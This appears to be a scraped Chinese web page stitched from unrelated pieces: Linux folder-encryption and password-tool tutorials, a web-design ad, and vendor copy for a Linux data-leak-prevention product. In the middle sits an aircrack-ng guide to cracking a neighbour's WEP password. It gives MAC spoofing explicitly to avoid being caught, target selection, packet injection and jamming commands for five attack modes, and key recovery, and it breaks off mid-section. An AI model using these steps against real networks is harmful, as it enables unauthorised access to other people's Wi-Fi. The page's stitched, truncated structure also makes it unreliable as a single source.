Linux使用密碼保護(hù)文件夾或目錄

假設(shè)您的Linux主目錄中有一個(gè)文件夾，您可以在其中存儲(chǔ)您不希望任何人在沒有密碼的情況下訪問的安全文檔文件。這樣，即使有人設(shè)法占用您的計(jì)算機(jī)并訪問您的主目錄，您的私人文件仍然有另一道防線。

成都創(chuàng)新互聯(lián)成立于2013年，是專業(yè)互聯(lián)網(wǎng)技術(shù)服務(wù)公司，擁有項(xiàng)目做網(wǎng)站、成都做網(wǎng)站網(wǎng)站策劃，項(xiàng)目實(shí)施與項(xiàng)目整合能力。我們以讓每一個(gè)夢(mèng)想脫穎而出為使命，1280元祁門做網(wǎng)站,已為上家服務(wù),為祁門各地企業(yè)和個(gè)人服務(wù),聯(lián)系電話:13518219792

Cryptkeeper是一個(gè)管理加密文件夾的Linux系統(tǒng)托盤小程序。在它下面，EncFS是一個(gè)基于FUSE的加密文件系統(tǒng)，它處理透明的加密/解密。

在本教程中，我將介紹如何使用Cryptkeeper密碼保護(hù)Linux上的文件夾。

在Fedora中安裝Cryptkeeper

您可以從Fedora的基礎(chǔ)存儲(chǔ)庫安裝Cryptkeeper：

$ sudo yum install cryptkeeper

安裝完成后，轉(zhuǎn)到“應(yīng)用程序” - “系統(tǒng)工具” - “Cryptkeeper”啟動(dòng)Cryptkeeper。

Cryptkeeper指示燈將顯示在右上角的桌面面板中。單擊指示器，然后選擇“新加密文件夾”以創(chuàng)建新的加密文件夾。

選擇要保護(hù)密碼的文件夾的名稱及其位置。

輸入新加密文件夾的密碼。單擊“轉(zhuǎn)發(fā)”按鈕后，它將創(chuàng)建一個(gè)新的加密文件夾。

要訪問加密文件夾，您需要先打開它。要打開現(xiàn)有的加密文件夾，請(qǐng)單擊Cryptkeeper指示器，然后單擊文件夾名稱。系統(tǒng)將提示您輸入密碼。文件夾打開后，您可以自由訪問其中的內(nèi)容。要再次使用密碼保護(hù)文件夾，只需單擊Cryptkeeper指示器中的文件夾名稱即可關(guān)閉該文件夾。

如果要將Cryptkeeper指示器設(shè)置為在桌面上自動(dòng)啟動(dòng)，請(qǐng)選擇“設(shè)置”下的“會(huì)話和啟動(dòng)”菜單。

在“Application Autostart”選項(xiàng)卡下添加Cryptkeeper。

在Ubuntu，Debian或Linux Mint中安裝Cryptkeeper

要在基于Debian的Linux上安裝Cryptkeeper，請(qǐng)使用apt-get命令。

$ sudo apt-get install cryptkeeper

在Ubuntu上，您可以通過Unity

Dash啟動(dòng)Cryptkeeper。在Debian或Linux Mint上，轉(zhuǎn)到“Applications” - “System

Tools” - “Cryptkeeper”以啟動(dòng)Cryptkeeper。

注意：在最新版本的Ubuntu桌面（例如，12.04,12.10和13.04）上，由于系統(tǒng)托盤的新白名單消除策略，Cryptkeeper指示符不會(huì)顯示在Unity的頂部面板通知區(qū)域中。要解決此問題，請(qǐng)首先獲取“systray-whitelist”值，然后將“Cryptkeeper”附加到現(xiàn)有白名單，如下所示。

$ gsettings get com.canonical.Unity.Panelsystray-whitelist

['JavaEmbeddedFrame'，'Wine'，'Update-notifier']

$ gsettings set com.canonical.Unity.Panel

systray-whitelist“['JavaEmbeddedFrame'，'Wine'，'Update-notifier'，'Cryptkeeper']”

如果您希望Cryptkeeper指示燈永久顯示在您的Ubuntu桌面上，請(qǐng)通過Dash啟動(dòng)“啟動(dòng)應(yīng)用程序”菜單，并將Cryptkeeper添加為啟動(dòng)程序。

轉(zhuǎn)自 嘉為教育-rhce認(rèn)證_rhce培訓(xùn)_linux培訓(xùn)_linux認(rèn)證_linux考證

如何在Linux中產(chǎn)生，加密或解密隨機(jī)密碼

1. 使用命令 pwgen 來生成一個(gè)長度為 10 個(gè)字符的獨(dú)特的隨機(jī)密碼。假如你還沒有安裝 pwgen，請(qǐng)使用 Apt 或 YUM 等包管理器來安裝它。

$ pwgen 101

生成一個(gè)獨(dú)特的隨機(jī)密碼

一口氣生成若干組長度為 50 個(gè)字符的唯一的隨機(jī)密碼!

$ pwgen 50

生成多組隨機(jī)密碼

2. 你還可以使用 makepasswd 來每次生成一個(gè)給定長度的獨(dú)特的隨機(jī)密碼。在你把玩 makepasswd 命令之前，請(qǐng)確保你已經(jīng)安裝了它。如若沒有安裝它，試試使用 Apt 或 YUM 包管理器來安裝 makepasswd這個(gè)軟件包。

生成一個(gè)長度為 10 個(gè)字符的隨機(jī)密碼。該命令產(chǎn)生的密碼的長度默認(rèn)為 10。

$ makepasswd

使用 makepasswd 生成獨(dú)特的密碼

生成一個(gè)長度為 50 個(gè)字符的隨機(jī)密碼。

$ makepasswd --char50

生成長度為 50 的密碼

生成 7 個(gè)長度為 20 個(gè)字符的隨機(jī)密碼。

$ makepasswd --char20--count 7

3. 使用帶“鹽”的 Crypt(注：這里應(yīng)該指的是一個(gè)函數(shù)，可以參考這里 ) 來加密一個(gè)密碼。提供手動(dòng)或自動(dòng)添加 “鹽”。

對(duì)于那些不清楚 鹽 的意義的人，這里的 “鹽” 指的是一個(gè)隨機(jī)數(shù)據(jù)，它作為密碼生成函數(shù)的一個(gè)額外的輸入， 目的是保護(hù)密碼免受詞典攻擊。

在執(zhí)行下面的操作前，請(qǐng)確保你已經(jīng)安裝了 mkpasswd。

下面的命令將帶 “鹽” 加密一個(gè)密碼?！胞}” 的值是隨機(jī)自動(dòng)生成的。所以每次你運(yùn)行下面的命令時(shí)，都將產(chǎn)生不同的輸出，因?yàn)樗看谓邮芰穗S機(jī)取值的 “鹽”。

$ mkpasswd tecmint

使用 Crypt 來加密密碼

現(xiàn)在讓我們來手動(dòng)定義 “鹽” 的值。每次它將產(chǎn)生相同的結(jié)果。請(qǐng)注意你可以輸入任何你想輸入的值來作為 “鹽” 的值。

$ mkpasswd tecmint -s tt

帶“鹽”加密密碼

另外， mkpasswd 還是交互式的，假如你在命令中沒有提供密碼，它將主動(dòng)詢問你來輸入密碼。

4. 使用 aes-256-cbc 加密算法并使用帶“鹽”的密碼(如 “tecmint”) 加密一個(gè)字符串(如 “Tecmint-is-a-Linux-Community”)。

# echo Tecmint-is-a-Linux-Community | openssl enc -aes-256-cbc -a -salt -pass pass:tecmint

在 Linux 中加密一個(gè)字符串

在上面例子中， echo 命令的輸出通過管道傳遞給了 openssl 命令，使得該輸出通過加密編碼方式(enc：Encoding with Cipher ) 所加密，這個(gè)過程中使用了 aes-256-cbc 加密算法，并附帶了密碼 (tecmint) 和 “鹽” 。

5. 使用 openssl 命令的 -aes-256-cbc 解密選項(xiàng)來解密上面的字符串。

# echo U2FsdGVkX18Zgoc+dfAdpIK58JbcEYFdJBPMINU91DKPeVVrU2k9oXWsgpvpdO/Z | openssl enc -aes-256-cbc -a -d -salt -pass pass:tecmint

在 Linux 中解密字符串

現(xiàn)在就是這些內(nèi)容了。

linux怎么開啟抓包tcp 53

Aircrack-ng系列工具也有Windows 平臺(tái)版本，但是本人的小黑的始終不能在win下抓包，所以只能 棄 Windows 從Linux 了，另外 Windows 下掃描到的 AP 也比 Linux 下少了很多。其實(shí) Windows 并不完整的支持 TCP/IP 協(xié)議族，有些協(xié)議Windows 直接丟棄不用。網(wǎng)絡(luò)本來從一開始就是 Unix 的天下，Windows 只是在后來加入了網(wǎng)絡(luò)的功能。 Aircrack-ng工具包有很多工具，我用到的工具主要有以下幾個(gè)： airmon-ng 處理網(wǎng)卡工作模式 airodump-ng 抓包 aircrack-ng 破解 aireplay-ng 發(fā)包，干擾 另外還要用到以下 linux 命令: ifconfig 查看修改網(wǎng)卡狀態(tài)和參數(shù) macchanger 偽造 MAC iwconfig 主要針對(duì)無線網(wǎng)卡的工具 (同 ifconfig) iwlist 獲取無線網(wǎng)絡(luò)的更詳細(xì)信息 另外還有其他的 linux 基本命令，我就不提示了。 具體破解步驟： 1. 修改無線網(wǎng)卡狀態(tài)：先 dow 2. 偽造無線網(wǎng)卡的 MAC 地址：安全起見，減少被抓到的可能 3. 修改網(wǎng)卡工作模式：進(jìn)入Monitor狀態(tài)，會(huì)產(chǎn)生一個(gè)虛擬的網(wǎng)卡 4. 修改無線網(wǎng)卡狀態(tài)： up 5. 查看網(wǎng)絡(luò)狀態(tài)，記錄下 AP 的 MAC 和本機(jī)的 MAC ，確定攻擊目標(biāo) 6. 監(jiān)聽抓包：生成 .cap 或 .ivs 7. 干擾無線網(wǎng)絡(luò)：截取無線數(shù)據(jù)包，發(fā)送垃圾數(shù)據(jù)包，用來獲得更多的有效數(shù)據(jù)包 8. 破解 .cap 或 .ivs ，獲得 WEP 密碼，完成破解Crack Mode一共有5種請(qǐng)酌情使用還有網(wǎng)卡不一定是ath1也有可能是wifi0，ath0等等 ifconfig -a ifconfig -a ath0 up airmon-ng start wifi0 6 airodump-ng --ivs -w 目標(biāo)路由器IVS文件 -c 6 ath1 airodump-ng ath1 aireplay-ng -1 0 -e 目標(biāo)路由器SSID -a 目標(biāo)MAC -h 本機(jī)MAC ath1 ----------- -2 Crack Mode----------- aireplay-ng -2 -p 0841 -c ffffffffffff -b 目標(biāo)MAC -h 本機(jī)MAC ath1 ----------- -3 Crack Mode----------- aireplay-ng -3 -b 目標(biāo)MAC -h 本機(jī)MAC ath1 ----------- -4 Crack Mode----------- aireplay-ng -4 -b 目標(biāo)MAC -h 本機(jī)MAC ath1 packetforge-ng -0 -a 目標(biāo)MAC -h 本機(jī)MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp aireplay-ng -2 -r MyArp -x 256 ath1 ----------- -5 Crack Mode----------- aireplay-ng -5 -b 目標(biāo)MAC -h 本機(jī)MAC ath1 packetforge-ng -0 -a 目標(biāo)MAC -h 本機(jī)MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp aireplay-ng -2 -r MyArp -x 256 ath1 -----------Crack Key----------- aircrack-ng -n 64 -b 目標(biāo)MAC 目標(biāo)路由器IVS文件-01.ivs —————————————————————————————— 　下面詳細(xì)介紹一下各個(gè)命令的基本用法（參照命令的英文說明） 1. ifconfig 用來配置網(wǎng)卡，我們這里主要用來 禁用和啟用 網(wǎng)卡： ifconfig ath0 down ifconfig ath0 up 禁用一下網(wǎng)卡的目的是為了下一步修改 MAC 。 2.macchanger 用來改變網(wǎng)卡的 MAC 地址，具體用法如下： usage: macchanger [options] device -h 顯示幫助 -V 顯示版本 -s 顯示當(dāng)前MAC -e 不改變mac,使用硬件廠商寫入的MAC -a 自動(dòng)生成一個(gè)同類型的MAC，同廠商的 -A 自動(dòng)生成一個(gè)不同類型的MAC，不同廠商的 -r 生成任意MAC -l 顯示已知廠商的網(wǎng)卡MAC地址分配，這個(gè)很有用，可以根據(jù)MAC查出來是哪個(gè)廠商生產(chǎn)的產(chǎn)品 -m 設(shè)置一個(gè)自定義的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。 3.airmon-ng 啟動(dòng)無線網(wǎng)卡進(jìn)入 Monitor 模式， useage: airmon-ng startstopcheck interface [channel] startstopcheck啟動(dòng)，停止，檢測(cè) interface指定無線網(wǎng)卡 [channel] 監(jiān)聽頻道，現(xiàn)代大多數(shù)無線路由默認(rèn)是 6，隨便掃描一下都是這個(gè)頻道，網(wǎng)管們應(yīng)該換換了 4.iwconfig 專用的無線網(wǎng)卡配置工具，用來配置特殊的網(wǎng)絡(luò)信息，不帶參數(shù)時(shí)顯示可用網(wǎng)絡(luò)。 useage：iwconfig interface [options] [essid{NNONOFF}] 指定essid號(hào) 開啟關(guān)閉 [nwid{NNonoff}] 指定網(wǎng)絡(luò)id號(hào) 開啟關(guān)閉 [mode {managedad-hoc....}] 指定無線網(wǎng)絡(luò)工作模式/類型 [freq N.NNNN[KMG]] 指定工作頻率 [channel N] 指定頻道 [ap {Noffauto}] 指定AP號(hào) 關(guān)閉/自動(dòng) [sens N] sens 號(hào) [nick N] nick 號(hào) [rate {Nautofixed}] 速率控制 [rts {Nautofixedoff}] rts控制，如果不知道什么是RTS，那就回去好好去學(xué)網(wǎng)絡(luò)，不用往下看了 [frag {Nautofixedoff}] 碎片控制 [enc {NNNN-NNNNoff}] 范圍 [power {period Ntimeout N}] 電源 頻率/超時(shí) [retry {limit Nlifetime N}] 重試 限次/超時(shí) [txpower N{mwdBm}] 功率 毫瓦/分貝 [commit] 處理 5.iwlist 主要用來顯示無線網(wǎng)卡的一些附加信息,同上 useage: iwlist [interface] options scanning 掃描 frequency 頻率 channel 頻道 bitrate 速率 rate 速率 encryption 加密 key 密鑰 power 電源 txpower 功率 ap ap accespoints ap peers 直連 event 事件 6.airodump-ng 抓包工具,我最喜歡用的,詳細(xì)用法如下: usage: airodump-ng options interface[,interface,...] Options: --ivs :僅將抓取信息保存為 .ivs --gpsd :使用 GPSd --write prefix :保存為指定日文件名,我一般用這個(gè),尤其是多個(gè)網(wǎng)絡(luò)時(shí),指定了也好區(qū)分 -w :同 --write --beacons :保存所有的 beacons ,默認(rèn)情況況下是丟棄那些無用的數(shù)據(jù)包的 --update secs :顯示更新延遲,沒有用過 --showack :顯示ack/cts/rts狀態(tài),還是那句,不知道rts就不用看了 -h :隱藏已知的,配合上面的選項(xiàng)使用 -f msecs :跳頻時(shí)間 --berlin secs :無數(shù)據(jù)包接收時(shí)延遲顯示的時(shí)間,這句不太好翻譯,意思是當(dāng)那個(gè)信號(hào)發(fā)出設(shè)備沒有發(fā)出數(shù)據(jù)包多少時(shí)間之后,就停止對(duì)它的監(jiān)視.默認(rèn)120秒.建議學(xué)好英文去讀原文,翻譯的都會(huì)有出入,這是我的理解.(mhy_mhy注) -r file :從指定的文件讀取數(shù)據(jù)包.我也想有人給我抓好包放哪里,呵呵 Filter options: --encrypt suite : 使用密碼序列過濾 AP --netmask netmask : 使用掩碼過濾 AP --bssid bssid : 使用 bssid 過濾 AP -a : 過濾無關(guān)的客戶端 默認(rèn)情況下使用2.4Ghz,你也可以指定其他的頻率,通過以下命令操作: --channel channels:指定頻道 --band abg :制定帶寬 -C frequencies :指定頻率MHz --cswitch method : 設(shè)置頻道交換方式 0 : FIFO (default) 先進(jìn)先出(默認(rèn)) 1 : Round Robin 循環(huán) 2 : Hop on last 最后一跳 -s : 同上 --help : 顯示使用方法,翻譯到這里,感覺還是英文的貼切一點(diǎn),建議讀原文 7.aireplay-ng

如何在Linux系統(tǒng)上加密

合力天下LINUX防泄密系統(tǒng)概述

Linux具有天生秉承的優(yōu)勢(shì)，越來越多的企業(yè)轉(zhuǎn)向了Linux的開發(fā)和應(yīng)用。使用Linux操作系統(tǒng)的單位多數(shù)都擁有自主知識(shí)產(chǎn)權(quán)，如果有絲毫的泄露，都會(huì)造成巨大的損失。 基于多年的數(shù)據(jù)防泄漏防護(hù)經(jīng)驗(yàn)，北京合力天下數(shù)碼信息技術(shù)有限公司自主研發(fā)了一套運(yùn)行在Linux平臺(tái)環(huán)境下，防止Linux系統(tǒng)中自主知識(shí)產(chǎn)權(quán)泄密的產(chǎn)品。該系統(tǒng)在不改變用戶使用習(xí)慣、計(jì)算機(jī)文件格式和編譯程序的情況下，對(duì)指定類型的代碼文件進(jìn)行實(shí)時(shí)、透明的加解密。所有通過非法途徑獲得的數(shù)據(jù)，都將以亂碼文件形式表現(xiàn)。

合力天下LINUX防泄密系統(tǒng)是一款功能強(qiáng)大且易于使用的LINUX文檔加密軟件產(chǎn)品，該系統(tǒng)采用“驅(qū)動(dòng)層AES智能透明加密技術(shù)”對(duì)指定類型的文件進(jìn)行實(shí)時(shí)、強(qiáng)制、透明的加解密。在正常使用時(shí)，計(jì)算機(jī)內(nèi)存中的文件是以受保護(hù)的明文形式存放，但硬盤上保存的數(shù)據(jù)卻處于加密狀態(tài)，如果沒有合法的使用身份、訪問權(quán)限和正確的安全通道，所有加密文件都將以密文狀態(tài)保存。

合力天下LINUX防泄密系統(tǒng)穩(wěn)定可靠，并且具備良好的可擴(kuò)展性，能同時(shí)滿足企業(yè)其它應(yīng)用系統(tǒng)文檔加密需求，有效防止數(shù)據(jù)丟失或泄露，有助于更深入、更全面地實(shí)施數(shù)據(jù)保護(hù)，從而確保企業(yè)機(jī)密數(shù)據(jù)的高度安全。

合力天下LINUX防泄密系統(tǒng)產(chǎn)品架構(gòu)

合力天下LINUX防泄密系統(tǒng)采用控制臺(tái)/服務(wù)器/代理（B/S/C）體系：服務(wù)器（Server）、客戶端代理（Agent）和控制臺(tái)（Management Console）三部分組成。

M/S/A三部分相互協(xié)調(diào)工作：管理員通過控制臺(tái)的WEB瀏覽器制訂靈活的安全策略；安全策略被保存在服務(wù)器上；終端計(jì)算機(jī)上安裝的代理主動(dòng)連接服務(wù)器；接收到網(wǎng)絡(luò)連接后，服務(wù)器把制訂好的策略下發(fā)到該終端計(jì)算機(jī)；終端計(jì)算機(jī)代理的安全引擎執(zhí)行安全策略，進(jìn)行安全控制。

合力天下LINUX防泄密系統(tǒng)部署模式

合力天下LINUX防泄密系統(tǒng)功能特點(diǎn)

一　驅(qū)動(dòng)層透明加密

針對(duì)研發(fā)單位，可對(duì)JAVA、C、C++ 等各種源代碼文件進(jìn)行透明加密保護(hù)；

針對(duì)手機(jī)、電子書等版權(quán)單位，可針對(duì)任何需要保護(hù)其版權(quán)的文檔類型進(jìn)行透明加密保護(hù)；

針對(duì)辦公環(huán)境，可對(duì)任何文件類型加密。

二　編譯加密源代碼

針對(duì)研發(fā)單位，加密的源代碼文檔無需解密為明文，可直接通過編譯進(jìn)程進(jìn)行編譯。

編譯后的Image文件是明文，便于產(chǎn)品的測(cè)試與分發(fā)。

三　網(wǎng)絡(luò)通信安全隧道

加密文檔(如源代碼)需要通過文檔版本管理軟件(如CVS\SVN\GIT)通過網(wǎng)絡(luò)或文件系統(tǒng)進(jìn)行集中備份與共享。加密文件系統(tǒng)提供網(wǎng)絡(luò)安全隧道功能，保護(hù)網(wǎng)絡(luò)通信中的加密文件。

如加密文件需要保存到服務(wù)器上，既可以密文存儲(chǔ)到服務(wù)器上也可以明文存儲(chǔ)到服務(wù)器上。

如明文存儲(chǔ)到服務(wù)器上，加密系統(tǒng)的網(wǎng)絡(luò)安全隧道可與合力天下LINUX防泄密系統(tǒng)服務(wù)器數(shù)據(jù)保護(hù)網(wǎng)關(guān)聯(lián)動(dòng)，實(shí)現(xiàn)加密文檔在上傳到服務(wù)器網(wǎng)關(guān)自動(dòng)解密，下載文件時(shí)網(wǎng)關(guān)自動(dòng)加密。如此既保障了文檔的可靠性、可用性，又保障文檔的安全性。

四　進(jìn)程合法性驗(yàn)證

對(duì)進(jìn)程進(jìn)行簽名認(rèn)證，驗(yàn)證通過的進(jìn)程，才是合法進(jìn)程，才能對(duì)加密文件行讀寫操作。

任何偽造進(jìn)程的方式都無法讀寫加密文檔。如更改進(jìn)程名稱、SVN多種協(xié)議讀寫加密文件等都無法解密文件。

五　自身安全強(qiáng)保護(hù)

系統(tǒng)具有自我保護(hù)能力，在自身受到破壞不完整時(shí)整個(gè)系統(tǒng)依然能夠保障數(shù)據(jù)的安全性。

粘貼/拷貝控制

系統(tǒng)具有防粘貼拷貝能力，不可信進(jìn)程可以拷貝任何數(shù)據(jù)到可信進(jìn)程；但可信進(jìn)程不允許拷貝數(shù)據(jù)到任何其它進(jìn)程，有效防止數(shù)據(jù)的泄露。

六　文件批量加密

可對(duì)明文文件批量加密，針對(duì)開源的文件很方便的合并到工程里面。

批量加密流程具有保護(hù)機(jī)制，防止已經(jīng)加密的文件再次加密，造成文件的損壞。

七　可離線工作

離線即客戶端網(wǎng)絡(luò)連接不上加密服務(wù)器所處的狀態(tài)，如外出辦公等。

加密系統(tǒng)支持離線辦公，離線的安全策略為最近一次在線時(shí)的文件加密策略。

八　與Windows加密系統(tǒng)兼容

Linux加密系統(tǒng)與Windows加密系統(tǒng)相互兼容：Windows加密的文件在Linux下能夠操作，在Linux加密的文件在Windows下能夠操作。

合力天下linux防泄密系統(tǒng)加密規(guī)則

1.不可信進(jìn)程規(guī)則

不可信進(jìn)程創(chuàng)建、編輯的文件都是明文文件。

不可信進(jìn)程讀取的加密文件是亂碼，不可以使用。

2.可信進(jìn)程規(guī)則

可信進(jìn)程創(chuàng)建符合加密規(guī)則的文件是加密的文件。

可信進(jìn)程可以透明讀寫編輯加密文件。

原不加密但符合加密規(guī)則文件，一但可信進(jìn)程進(jìn)行了編輯，則原文件成為加密文件。

可信進(jìn)程在未創(chuàng)建、讀寫加密文件前，創(chuàng)建不符合加密規(guī)則的文件是明文的。

可信進(jìn)程在未創(chuàng)建、讀寫加密文件前，可以任意編輯明文文件，該文件不被加密。

可信進(jìn)程一旦創(chuàng)建、編輯了加密文件，則后續(xù)創(chuàng)建、編輯的所有文件都是加密的。

3.進(jìn)程間拷貝粘貼規(guī)則

可以自由的從不可信進(jìn)程中粘貼拷貝文字到可信進(jìn)程。

可以自由的從不可信進(jìn)程中粘貼拷貝文字到不可信進(jìn)程。

可信進(jìn)程的文字拷貝受到安全保護(hù)，禁止隨意拷貝文字。

4.編譯器進(jìn)程規(guī)則

編譯器創(chuàng)建的二進(jìn)制文件是明文的，可以隨意燒到嵌入式設(shè)備中。

5.離線加密規(guī)則

支持離線文檔加密。

離線規(guī)則為最近一次上線的文檔加密規(guī)則。

6.文件批量加密

支持文件批量代碼加密轉(zhuǎn)化。

已經(jīng)加密的文件不會(huì)被二次加密。

合力天下LINUX防泄密系統(tǒng)功能表